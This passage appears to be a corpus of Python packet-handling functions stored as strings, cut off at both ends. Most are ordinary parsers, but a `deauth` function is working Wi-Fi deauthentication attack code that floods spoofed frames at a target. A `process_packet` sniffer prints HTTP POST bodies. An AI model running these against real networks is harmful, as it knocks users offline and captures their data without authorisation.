Scapy will handle the rest.\n packet = Ether(base64.decodebytes(payload_base64))\n\n if IP in packet:\n return packet\n\n return None # actually not interested in packet not having IP layer\n except Exception as e: # FIXME\n logging.debug(e)", "def pkt_type(self):\n return uint16_packer.unpack(self[32:34])[0]", "def packet_decoder(packet_type,string):\n dct = json.loads(string)\n if packet_type == HS_Version:\n return HS_Version(dct['version'])\n if packet_type == HS_Options:\n return HS_Options(minport=dct['minport'], maxport=dct['maxport'],\n portusage=dct['portusage'], protocol=dct['protocol'],\n timeout=dct['timeout'], payload=dct['payload'],\n key=dct['key'])\n if packet_type == Data:\n return Data(data=dct['data'], terminate=int(dct['terminate']))\n if packet_type == Management:\n return Management(dct['command'],location=dct['location'])\n if packet_type == Switching:\n return Switching(dct['status'])\n if packet_type == Error:\n return Error()", "def spoof_packet(packet):", "def arp_parse(data):\n\t# Iteratize pkt\n\tpkt = packet.Packet(data)\n\ti = iter(pkt)\n\teth_pkt = next(i)\n\t\t# Ensure it's an ethernet frame.\n\tassert isinstance(eth_pkt, ethernet.ethernet)\n\n\tarp_pkt = next(i)\n\tif not isinstance(arp_pkt, arp.arp):\n\t\traise ARPPacket.ARPUnknownFormat()\n\n\tif arp_pkt.opcode not in (ARP_REQUEST, ARP_REPLY):\n\t\traise ARPPacket.ARPUnknownFormat(\n\t\t\tmsg='unsupported opcode %d' % arp_pkt.opcode)\n\n\tif arp_pkt.proto != ETH_TYPE_IP:\n\t\traise ARPPacket.ARPUnknownFormat(\n\t\t\tmsg='unsupported arp ethtype 0x%04x' % arp_pkt.proto)\n\n\treturn arp_pkt", "def gen_raw_from_broadlink(data):\n v = iter(data)\n code = next(v)\n next(v) # repeat\n\n assert code == 0x26 # IR\n\n length = int.from_bytes(islice(v, 2), byteorder='little')\n assert length >= 3 # a At least trailer\n \n def decode_one(x):\n return round(x * 8192 / 269, 0)\n\n def decode_iter(x):\n sign = 1\n while True:\n try:\n d = next(x)\n except StopIteration:\n return\n if d == 0:\n d = int.from_bytes(islice(x, 2), byteorder='big')\n \n yield sign * decode_one(d)\n sign = sign * -1\n \n yield from decode_iter(islice(v, length))\n\n rem = list(v)\n if any(rem):\n LOG.warning(\"Ignored extra data: %s\", rem)", "def deauth(self):\n # https://man7.org/linux/man-pages/man7/packet.7.html\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)\n s.bind((self.interface, 0))\n\n # The RadioTap version is always 0\n rt_version = 0\n # The padding is always 0\n rt_padding = 0\n # The empty RadioTap frame has length of 8 bytes\n rt_length = 8\n # The RadioTap flags are irrelevant\n rt_flags = 0 \n # Construct the empty RadioTap frame (1,1,2,4 bytes)\n # https://docs.python.org/3/library/struct.html\n rt_frame = struct.pack(\n 'BBHI',\n rt_version,\n rt_padding,\n rt_length,\n rt_flags\n )\n\n # The 802.11 de-authentication subtype(4bits), type(2bits), version(2bits)\n dot11_type = int(b'11000000', 2)\n # The 802.11 flags are irrelevant\n dot11_flags = 0 \n # The 802.11 duration is irrelevant\n dot11_dur = 0\n # The 802.11 receiver address\n dot11_ra = bytes(map(lambda x: int(x, 16) , self.target_addr.split(':')))\n # The 802.11 transmitter address\n dot11_ta = bytes(map(lambda x: int(x, 16) , self.access_point.split(':')))\n # The 802.11 access point address\n dot11_ap = dot11_ta\n # The 802.11 sequence control is irrelevant\n dot11_sc = 0\n # The 802.11 reason code is irrelevant (0 is fine)\n dot11_reason = 0\n # Construct the 802.11 frame (1,1,2,6,6,6,2,2 bytes)\n # https://docs.python.org/3/library/struct.html\n 
dot11_frame = struct.pack(\n 'BBH6s6s6sHH',\n dot11_type,\n dot11_flags,\n dot11_dur,\n dot11_ra,\n dot11_ta,\n dot11_ap,\n dot11_sc,\n dot11_reason\n )\n\n # Construct the full payload (RadioTap + 802.11)\n payload = rt_frame + dot11_frame \n\n # Send packets while running and sending\n while 1:\n while self.sending:\n s.send(payload)\n time.sleep(1)", "def _finalize_packet(self, rudp_packet):\n return rudp_packet.to_bytes()", "def _processPacket(self, packet):\n packet_type = (packet[0] & 0xF0) >> 4\n packet_flags = (packet[0] & 0x0F)\n\n if packet_type == CONNECT:\n self._handleConnect(packet)\n elif packet_type == CONNACK:\n self._handleConnack(packet)\n elif packet_type == PUBLISH:\n self._handlePublish(packet)\n elif packet_type == PUBACK:\n self._handlePuback(packet)\n elif packet_type == PUBREC:\n self._handlePubrec(packet)\n elif packet_type == PUBREL:\n self._handlePubrel(packet)\n elif packet_type == PUBCOMP:\n self._handlePubcomp(packet)\n elif packet_type == SUBSCRIBE:\n self._handleSubscribe(packet)\n elif packet_type == SUBACK:\n self._handleSuback(packet)\n elif packet_type == UNSUBSCRIBE:\n self._handleUnsubscribe(packet)\n elif packet_type == UNSUBACK:\n self._handleUnsuback(packet)\n elif packet_type == PINGREQ:\n self._handlePingreq(packet)\n elif packet_type == PINGRESP:\n self._handlePingresp(packet)\n elif packet_type == DISCONNECT:\n self._handleDisconnect(packet)\n else:\n print(\"ERROR: Invalid Packet Type: %s -- Aborting Connection\" %(packet_type))\n self.transport.abortConnection()", "def parsePacket(self, packet):\n \n pcktParts = packet.split()\n \n # needs exactly 4 parts\n if len(pcktParts) != 4:\n raise PacketException(\"Packet malformed.\")\n \n direction = pcktParts[0]\n ip = pcktParts[1]\n port = pcktParts[2]\n flag = pcktParts[3]\n\n try:\n pckt = Packet(direction, ip, port, flag)\n except Exception as ex:\n eprint(\"Corrupt Packet:{0} Ignoring packet:\\n{1}\".format(ex, packet.__str__()))\n return None\n \n return pckt", "def decode_raw(input_bytes,\n out_type,\n little_endian=True,\n fixed_length=None,\n name=None):\n if fixed_length is not None:\n return gen_parsing_ops.decode_padded_raw(\n input_bytes,\n fixed_length=fixed_length,\n out_type=out_type,\n little_endian=little_endian,\n name=name)\n else:\n return gen_parsing_ops.decode_raw(\n input_bytes, out_type, little_endian=little_endian, name=name)", "def __packetHandler(self, hdr, data):\n\t\tif self.quit: raise SystemExit('capture on interface stoped.')\n\n\t\tdecoded_data = self.decoder.decode(data)\n\t\t(src, dst, data) = self.__getHeaderInfo(decoded_data)\n\t\tfor item in regex_links.finditer(str(data)):\n\t\t\tif not item: continue\n\t\t\t#pos = item.start()\n\t\t\tlink = item.groups()[0]\n\t\t\t#self.buffer.append( (link,) )\n\t\t\tself.buffer.append( (link,src,dst,) )\t# append to internal buffer", "def decode(self,buf):\n eth = dpkt.ethernet.Ethernet(buf)\n pkt_len = len(buf)\n if(eth.type== dpkt.ethernet.ETH_TYPE_IP):\n ip = eth.data\n dst_ip = socket.inet_ntoa(ip.dst)\n src_ip = socket.inet_ntoa(ip.src)\n octet_list = string.split(dst_ip,'.')\n broadcast = False\n for o in octet_list:\n if (o == \"255\"):\n broadcast = True\n break\n if((octet_list[0] == \"224\") or (octet_list[0] == \"239\")):\n broadcast = True #Its multicast actually.\n if not broadcast:\n if(ip.p == dpkt.ip.IP_PROTO_TCP):\n pass\n elif(ip.p == dpkt.ip.IP_PROTO_UDP):\n udp =ip.data\n if((udp.dport == 53) or (udp.sport == 53)): # A request. \n if(udp.dport == 53): # A request. 
\n return self.dns_handler.handle_dns_request(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n if(udp.sport == 53): # A DNS response\n self.dns_handler.handle_dns_response(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n else:\n pass", "def process_packet(packet):\n if packet.haslayer(HTTPRequest):\n # if this packet is an HTTP Request\n # get the requested URL\n url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()\n # get the requester's IP Address\n ip = packet[IP].src\n # get the request method\n method = packet[HTTPRequest].Method.decode()\n print(\"\\n{GREEN}[+] \", ip, \"Requested \", url, \" with \", method)\n if show_raw and packet.haslayer(Raw) and method == \"POST\":\n # if show_raw flag is enabled, has raw data, and the requested method is \"POST\"\n # then show raw\n print(\"\\n{RED}[*] Some useful Raw data: \", packet[Raw].load)", "def processpacket(p):\n\n\tglobal SynSentToTCPService\n\tglobal SynAckSentToTCPClient\n\tglobal LiveTCPService\n\tglobal LiveTCPClient\n\tglobal LiveUDPService\n\tglobal LiveUDPClient\n\tglobal NmapServerDescription\n\tglobal ManualServerDescription\n\tglobal ClientDescription\n\tglobal MacAddr\n\tglobal OSDescription\n\tglobal ServiceFPs\n\tglobal SipPhoneMatch\n\tglobal Devel\n\tglobal IsRouter\n\tglobal DNSRecord\n\tglobal HostIPs\n\n\tif (type(p) == Dot3) and (type(p['LLC']) == LLC):\n\t\tUnhandledPacket(p)\n\t\t#Spanning Tree Protocol\n\t\t#Debug(\"802.3\")\n\t\t#p.show()\n\t\t#print type(p['LLC'])\n\telif (p['Ethernet'] == None):\n\t\tDebug(\"non-ethernet packet\")\t\t#Need more details on how to handle.\n\t\tUnhandledPacket(p)\n\t\t#p.show()\n\t\t#print type(p)\n\t\t#quit()\n\telif p['Ethernet'].type == 0x0806:\t\t#ARP\n\t\t#pull arp data from here instead of tcp/udp packets, as these are all local\n\t\tif (p['ARP'].op == 1):\t\t\t#1 is request (\"who-has\")\n\t\t\tpass\n\t\tif (p['ARP'].op == 2):\t\t\t#2 is reply (\"is-at\")\n\t\t\tif (p['ARP.psrc'] != None) and (p['ARP.hwsrc'] != None):\n\t\t\t\tIPAddr=p['ARP.psrc']\n\t\t\t\tMyMac=p['ARP.hwsrc'].upper()\n\t\t\t\tif (not MacAddr.has_key(IPAddr)) or (MacAddr[IPAddr] != MyMac):\n\t\t\t\t\tReportId(\"MA\", IPAddr, 'Ethernet', MyMac, '')\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x0800:\t\t#IP\n\t\tsIP=str(p['IP'].src)\n\t\tdIP=str(p['IP'].dst)\n\t\t#Best to get these from arps instead; if we get them from here, we get router macs for foreign addresses.\n\t\t#if not MacAddr.has_key(sIP):\n\t\t#\tReportId(\"MA\", sIP, \"Ethernet\", p['Ethernet'].src, '')\n\t\t#if not MacAddr.has_key(dIP):\n\t\t#\tReportId(\"MA\", dIP, \"Ethernet\", p['Ethernet'].dst, '')\n\n\t\tif p['IP'].proto == 1:\t\t\t#ICMP\n\t\t\tType = p['ICMP'].type\n\t\t\tCode = p['ICMP'].code\n\n\t\t\tif (Type == 0):\t\t\t\t\t\t#Echo reply\n\t\t\t\tif (not(OSDescription.has_key(sIP))):\n\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", 'icmp echo reply')\n\t\t\telif (Type == 3) and (type(p[IPerror]) == IPerror):\t#Unreachable, check that we have an actual embedded packet\n\t\t\t\t#if (type(p[IPerror]) != IPerror):\n\t\t\t\t#\tp.show()\n\t\t\t\t#\tprint type(p[IPerror])\n\t\t\t\t#\tquit()\n\t\t\t\tOrigdIP = p[IPerror].dst\n\t\t\t\tif (Code == 0):\t\t\t\t\t#Net unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"NetUn\", \"router\", \"\")\n\t\t\t\telif (Code == 1):\t\t\t\t#Host 
unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"HostUn\", \"router\", \"\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 17):\t#Port unreachable and embedded protocol = 17, UDP, as it should be\n\t\t\t\t\tDNSServerLoc = p[IPerror].src + \",UDP_53\"\n\t\t\t\t\tif (p[UDPerror].sport == 53) and (ManualServerDescription.has_key(DNSServerLoc)) and (ManualServerDescription[DNSServerLoc] == \"dns/server\"):\n\t\t\t\t\t\t#If orig packet coming from 53 and coming from a dns server, don't do anything (closed port on client is a common effect)\n\t\t\t\t\t\t#Don't waste time on port unreachables going back to a dns server; too common, and ephemeral anyways.\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\t#If orig packet coming from something other than 53, or coming from 53 and NOT coming from a dns server, log as closed\n\t\t\t\t\t\tOrigDPort = str(p[UDPerror].dport)\n\t\t\t\t\t\tOrigDstService = OrigdIP + \",UDP_\" + OrigDPort\n\t\t\t\t\t\tif ((not LiveUDPService.has_key(OrigDstService)) or (LiveUDPService[OrigDstService] == True)):\n\t\t\t\t\t\t\tLiveUDPService[OrigDstService] = False\n\t\t\t\t\t\t\tReportId(\"US\", OrigdIP, \"UDP_\" + OrigDPort, \"closed\", \"port unreachable\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 6) and (p[TCPerror].dport == 113):\t#Port unreachable and embedded protocol = 6, TCP, which it shouldn't. May be the same firewall providing the TCP FR's\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 6):\t\t\t\t#Net unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unknown')\n\t\t\t\telif (Code == 7):\t\t\t\t#Host unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unknown')\n\t\t\t\telif (Code == 9):\t\t\t\t#Network Administratively Prohibited\n\t\t\t\t\tpass\t\t\t\t\t#Can't tell much from this type of traffic. 
Possibly list as firewall?\n\t\t\t\telif (Code == 10):\t\t\t\t#Host Administratively Prohibited\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 11):\t\t\t\t#Network unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 12):\t\t\t\t#Host unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 13):\t\t\t\t#Communication Administratively prohibited\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (Type == 8):\t\t\t\t\t#ping\n\t\t\t\t#FIXME - check payload for ping sender type, perhaps\n\t\t\t\tpass\n\t\t\telif (Type == 11):\t\t\t\t\t#Time exceeded\n\t\t\t\tif (Code == 0):\t\t\t\t\t#TTL exceeded\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\t#FIXME - put original target IP as column 5?\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"TTLEx\", \"router\", \"\")\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 2:\t\t#IGMP\n\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 6:\t\t#TCP\n\t\t\tsport=str(p['TCP'].sport)\n\t\t\tdport=str(p['TCP'].dport)\n\t\t\t#print p['IP'].src + \":\" + sport + \" -> \", p['IP'].dst + \":\" + dport,\n\t\t\tif (p['TCP'].flags & 0x17) == 0x12:\t#SYN/ACK (RST and FIN off)\n\t\t\t\tCliService = dIP + \",TCP_\" + sport\n\t\t\t\tif not SynAckSentToTCPClient.has_key(CliService):\n\t\t\t\t\tSynAckSentToTCPClient[CliService] = True\n\n\t\t\t\t#If we've seen a syn sent to this port and have either not seen any SA/R, or we've seen a R in the past:\n\t\t\t\t#The last test is for a service that was previously closed and is now open; report each transition once.\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == False)) ):\n\t\t\t\t\tLiveTCPService[Service] = True\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", '')\n\t\t\telif (p['TCP'].flags & 0x17) == 0x02:\t#SYN (ACK, RST, and FIN off)\n\t\t\t\tService = dIP + \",TCP_\" + dport\n\t\t\t\tif not SynSentToTCPService.has_key(Service):\n\t\t\t\t\tSynSentToTCPService[Service] = True\n\t\t\t\t#Debug(\"trying to fingerprint \" + sIP)\n\t\t\t\ttry:\n\t\t\t\t\tp0fdata = p0f(p)\n\t\t\t\t\t#FIXME - reasonably common occurence, don't whine, just fix it.\n\t\t\t\t\t#if (len(p0fdata) >1):\n\t\t\t\t\t#\tDebug(\"More than one OS fingerprint for \" + sIP + \", using the first.\")\n\t\t\t\t\tif (len(p0fdata) >=1):\n\t\t\t\t\t\tPDescription = p0fdata[0][0] + \" \" + p0fdata[0][1] + \" (\" + str(int(p0fdata[0][2]) + 1)\t#FIXME - Grabbing just the first candidate, may need to compare correlation values; provided?\n\t\t\t\t\t\tif (p0fdata[0][2] == 0):\n\t\t\t\t\t\t\tPDescription = PDescription + \" hop away)\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tPDescription = PDescription + \" hops away)\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t#[N][2] param appears to be distance away in hops (but add 1 to this to get real hop count?)\n\t\t\t\t\t\tPDescription = PDescription.replace(',', ';')\t\t#Commas are delimiters in output\n\t\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\t\texcept:\n\t\t\t\t\tPDescription = 'p0f failure'\n\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\tDebug(\"P0f failure in \" + sIP + \":\" + sport + \" -> \" + dIP + \":\" + dport)\n\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", 
\"live\", PDescription)\n\t\t\telif (p['TCP'].flags & 0x07) == 0x01:\t#FIN (SYN/RST off)\n\t\t\t\tCliService = sIP + \",TCP_\" + dport\n\t\t\t\tif ( (SynAckSentToTCPClient.has_key(CliService)) and ((not LiveTCPClient.has_key(CliService)) or (LiveTCPClient[CliService] == False)) ):\n\t\t\t\t\tLiveTCPClient[CliService] = True\n\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", '')\n\t\t\telif (p['TCP'].flags & 0x07) == 0x04:\t#RST (SYN and FIN off)\n\t\t\t\t#FIXME - handle rst going in the other direction?\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == True)) ):\n\t\t\t\t\tLiveTCPService[Service] = False\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"closed\", '')\n\t\t\telif ((p['TCP'].flags & 0x3F) == 0x15) and (sport == \"113\"):\t#FIN, RST, ACK (SYN, PSH, URG off)\n\t\t\t\t#This may be a firewall or some other device stepping in for 113 with a FIN/RST.\n\t\t\t\tpass\n\t\t\telif (p['TCP'].flags & 0x17) == 0x10:\t#ACK (RST, SYN, and FIN off)\n\t\t\t\t#FIXME - check for UnhandledPacket placement in ACK\n\t\t\t\tFromPort = sIP + \",TCP_\" + sport\n\t\t\t\tToPort = dIP + \",TCP_\" + dport\n\t\t\t\tPayload = str(p['Raw.load'])\t\t\t#For some reason this doesn't handle p['Raw'].load\n\t\t\t\tif ( (LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True) and (LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\n\t\t\t\t\tprint \"Logic failure: both \" + FromPort + \" and \" + ToPort + \" are listed as live services.\"\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\telif ((LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True)):\t#If the \"From\" side is a known TCP server:\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort) ):\t\t#Check nmap fingerprint strings for this server port\n\t\t\t\t\t\tif (ServiceFPs.has_key(int(sport))):\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs[int(sport)]:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\t#Debugging:\n\t\t\t\t\t\t\t\t\t#FIXME - removeme once understood:\n\t\t\t\t\t\t\t\t\t#File \"/home/wstearns/med/programming/python/passer/passer.py\", line 504, in processpacket\n\t\t\t\t\t\t\t\t\t#OutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\t#TypeError: expected a character buffer object\n\t\t\t\t\t\t\t\t\tif (OneTuple[1] == None):\n\t\t\t\t\t\t\t\t\t\tDebug(\"Null description for \" + OneTuple[0])\n\t\t\t\t\t\t\t\t\t\t#quit()\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\t#Example: Replace \"$1\" with MatchObj.group(1)\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), str(MatchObj.group(Index)))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t#Exit for loop, no need to check any more fingerprints now that we've found a match\n\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort)):\t\t#If the above loop didn't find a server description\n\t\t\t\t\t\tif (ServiceFPs.has_key('all')):\t\t\t\t#Now recheck 
against regexes not associated with a specific port (port 'all').\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs['all']:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif (not ManualServerDescription.has_key(FromPort) ):\n\t\t\t\t\t\tif (sport == \"22\") and (Payload != None) and (Payload.find('SSH-') > -1):\n\t\t\t\t\t\t\tif ( (Payload.find('SSH-1.99-OpenSSH_') > -1) or (Payload.find('SSH-2.0-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/openssh\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/openssh\"\n\t\t\t\t\t\t\telif (Payload.find('SSH-1.5-') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/generic\"\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' ESMTP Sendmail ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/sendmail\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/sendmail\"\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' - Welcome to our SMTP server ESMTP') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t#Check for port 80 and search for \"Server: \" once\n\t\t\t\t\t\telif (sport == \"80\") and (Payload != None) and (Payload.find('Server: ') > -1):\n\t\t\t\t\t\t\tif (Payload.find('Server: Apache') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/apache\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/apache\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Embedded HTTP Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/embedded\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/embedded\"\n\t\t\t\t\t\t\telif (Payload.find('Server: gws') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/gws\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/gws\"\n\t\t\t\t\t\t\telif (Payload.find('Server: KFWebServer') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/kfwebserver\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/kfwebserver\"\n\t\t\t\t\t\t\telif (Payload.find('Server: micro_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + 
sport, \"listening\", \"http/micro-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/micro-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Microsoft-IIS') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/iis\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/iis\"\n\t\t\t\t\t\t\telif (Payload.find('Server: lighttpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/lighttpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/lighttpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: MIIxpc') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mirrorimage\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mirrorimage\"\n\t\t\t\t\t\t\telif (Payload.find('Server: mini_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mini-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mini-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nc -l -p 80') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nc\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nc\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nginx/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nginx\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nginx\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Nucleus') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nucleus\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nucleus\"\n\t\t\t\t\t\t\telif (Payload.find('Server: RomPager') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/rompager\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/rompager\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/server\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/server\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Sun-ONE-Web-Server/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/sun-one\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/sun-one\"\n\t\t\t\t\t\t\telif (Payload.find('Server: TrustRank Frontend') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/trustrank\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + 